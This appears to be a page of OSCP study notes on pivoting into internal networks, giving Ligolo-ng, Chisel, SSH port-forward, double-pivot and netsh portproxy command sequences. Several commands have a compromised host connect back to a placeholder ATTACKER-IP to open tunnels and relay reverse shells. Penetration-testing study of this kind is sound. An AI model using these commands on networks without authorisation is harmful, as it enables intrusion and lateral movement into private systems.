// notes/ Pivoting & Tunneling
🧭
Pivoting Attack Chain
When and how to pivot into an internal network.
#pivot#methodology
source · airouboss/oscp-prep-notes-2026 · methodology/attack-chains/pivoting.md ↗Pivoting Chains
Ligolo-ng Setup
bash
$# On attacker (proxy):$sudo ip tuntap add user $(whoami) mode tun ligolo$sudo ip link set ligolo up$./proxy -selfcert -laddr 0.0.0.0:11601$ $# On pivot host (agent):$./agent -connect ATTACKER-IP:11601 -ignore-cert$ $# On attacker — add route to internal subnet:$sudo ip route add 10.10.10.0/24 dev ligolo$# In proxy console:$session # Select the agent$start # Start the tunnel$ $# For reverse shells through the tunnel (listener redirect):$listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443 --tcpChisel Reverse SOCKS
bash
$# On attacker (server):$./chisel server --reverse --port 8080$ $# On pivot host (client):$./chisel client ATTACKER-IP:8080 R:socks$ $# Use with proxychains (edit /etc/proxychains4.conf):$# socks5 127.0.0.1 1080$proxychains nmap -sT -Pn 10.10.10.0/24 -p 445$proxychains evil-winrm -i 10.10.10.5 -u admin -p passSSH Dynamic Port Forward → proxychains
bash
$# Dynamic SOCKS proxy:$ssh -D 9050 user@PIVOT-IP -N -f$# Edit /etc/proxychains4.conf:$# socks5 127.0.0.1 9050$proxychains nmap -sT -Pn INTERNAL-IP$ $# Local port forward (single port):$ssh -L 8888:INTERNAL-IP:80 user@PIVOT-IP -N -f$curl http://127.0.0.1:8888$ $# Remote port forward:$ssh -R 9999:127.0.0.1:445 user@ATTACKER-IP -N -fDouble Pivot (Host A → Host B → Host C)
bash
$# Ligolo-ng double pivot:$# 1. Set up first tunnel (Attacker → Host A → Network B)$# 2. Upload second agent to Host B via tunnel$# 3. On Host B, connect agent back through listener:$listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp$# 4. Run agent on Host B: ./agent -connect HOST-A-IP:11601 -ignore-cert$# 5. Add second route: sudo ip route add 172.16.0.0/24 dev ligolo$# 6. Start second session$ $# SSH double pivot:$ssh -J user@PIVOT-A user@PIVOT-B -D 9050$proxychains nmap -sT -Pn NETWORK-C-HOSTPort Forward for Restricted Services
bash
$# MySQL only listening on localhost of target:$# Chisel:$./chisel client ATTACKER-IP:8080 R:3306:127.0.0.1:3306$mysql -h 127.0.0.1 -u root -p$ $# SSH local forward:$ssh -L 3306:127.0.0.1:3306 user@TARGET -N -f$mysql -h 127.0.0.1 -u root -p$ $# Ligolo listener:$listener_add --addr 0.0.0.0:3306 --to 127.0.0.1:3306 --tcp$ $# netsh (Windows):$netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=3306 connectaddress=127.0.0.1